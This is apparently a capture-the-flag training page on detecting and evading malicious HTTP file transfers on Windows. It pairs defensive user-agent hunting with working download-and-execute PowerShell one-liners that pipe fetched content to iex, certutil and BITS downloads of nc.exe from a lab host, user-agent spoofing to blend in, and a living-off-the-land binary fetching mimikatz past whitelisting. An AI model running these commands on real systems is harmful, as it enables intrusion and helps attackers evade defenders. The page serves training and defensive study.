> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/detect-or-be-detected.md).

# Detect or be Detected

### Detection

Command-line detection based on blacklisting is straightforward to bypass.

Even simple case obfuscation can break it.

Whitelisting takes longer to build, but it is far more robust.

Once a whitelist exists, unusual command lines stand out fast.

Most client-server protocols negotiate how content will be delivered before exchanging data.

HTTP works this way.

Interoperability matters across different web servers and browsers.

That is why HTTP clients identify themselves with a user agent string.

Servers use that string to identify the client, such as Firefox, Chrome, or something else entirely.

User agents are not limited to browsers.

Anything acting as an HTTP client can send one.

That includes `cURL`, custom Python scripts, `sqlmap`, and `Nmap`.

Organizations can improve detection by building a list of known legitimate user agents.

That list should include:

* normal browser user agents
* default operating system user agents
* update services such as Windows Update
* antivirus update traffic

These values can feed into a SIEM for threat hunting.

That makes it easier to filter legitimate traffic and focus on anomalies.

Suspicious user agents can then be reviewed for malicious behavior.

Useful references:

* This website is handy for identifying common user agent strings.
* A list of user agent strings is available here.

Malicious file transfers can also be detected through their user agents.

The examples below show user agents and headers observed from common HTTP transfer techniques.

The tests were run on Windows 10, version `10.0.14393`, with PowerShell `5`.

### Observed user agents and headers

#### `Invoke-WebRequest`

**Client**

```powershell
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
PS C:\htb> Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
```

**Server**

```http
GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0
```

#### `WinHttpRequest`

**Client**

```powershell
PS C:\htb> $h=new-object -com WinHttp.WinHttpRequest.5.1;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.ResponseText
```

**Server**

```http
GET /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
```

#### `Msxml2`

**Client**

```powershell
PS C:\htb> $h=New-Object -ComObject Msxml2.XMLHTTP;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.responseText
```

**Server**

```http
GET /nc.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
```

#### `Certutil`

**Client**

```cmd
C:\htb> certutil -urlcache -split -f http://10.10.10.32/nc.exe
C:\htb> certutil -verifyctl -split -f http://10.10.10.32/nc.exe
```

**Server**

```http
GET /nc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
```

#### `BITS`

**Client**

```powershell
PS C:\htb> Import-Module bitstransfer;
PS C:\htb> Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t;
PS C:\htb> $r=gc $env:temp\t;
PS C:\htb> rm $env:temp\t;
PS C:\htb> iex $r
```

**Server**

```http
HEAD /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
```

This only scratches the surface of detecting malicious file transfers.

A strong starting point is to create:

* a whitelist of allowed binaries
* a blacklist of binaries commonly abused

Hunting for anomalous user agent strings is also a strong way to catch an attack in progress.

Threat hunting and detection techniques come up again in later modules.

### Evading detection

#### Changing the user agent

If defenders blacklist common user agents, `Invoke-WebRequest` gives you a `-UserAgent` parameter.

That lets you change the default value to emulate Internet Explorer, Firefox, Chrome, Opera, or Safari.

If Chrome is common in the environment, using that user agent may look more normal.

#### Listing available user agents

```powershell
PS C:\htb>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
```

Example output:

```powershell
Name       : InternetExplorer
User Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)

Name       : FireFox
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0

Name       : Chrome
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0
             Safari/534.6

Name       : Opera
User Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1

Name       : Safari
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0
             Safari/533.16
```

#### Request with a Chrome user agent

Use `Invoke-WebRequest` with a Chrome user agent to make the request blend in more easily.

**Client**

```powershell
PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
```

**Server**

```bash
impale7@htb[/htb]$ nc -lvnp 80

listening on [any] 80 ...
connect to [10.10.10.32] from (UNKNOWN) [10.10.10.132] 51313
GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6
(KHTML, Like Gecko) Chrome/7.0.500.0 Safari/534.6
Host: 10.10.10.32
Connection: Keep-Alive
```

### LOLBAS and GTFOBins

Application whitelisting may block PowerShell or Netcat.

Command-line logging may also alert defenders.

In that case, use a LOLBIN.

That means a living-off-the-land binary.

These are also called misplaced trust binaries.

One example is the Intel Graphics Driver binary for Windows 10, `GfxDownloadWrapper.exe`.

It exists on some systems and can download configuration files periodically.

That behavior can be abused for file transfer.

#### Transfer a file with `GfxDownloadWrapper.exe`

```powershell
PS C:\htb> GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
```

This binary may be allowed by application whitelisting and excluded from alerting.

Other common binaries may also work.

Check the LOLBAS project for a file download binary that exists in the environment.

On Linux, the equivalent resource is GTFOBins.

It is equally worth checking.

At the time of writing, GTFOBins documents nearly 40 commonly installed binaries that can be used for file transfers.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/detect-or-be-detected.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
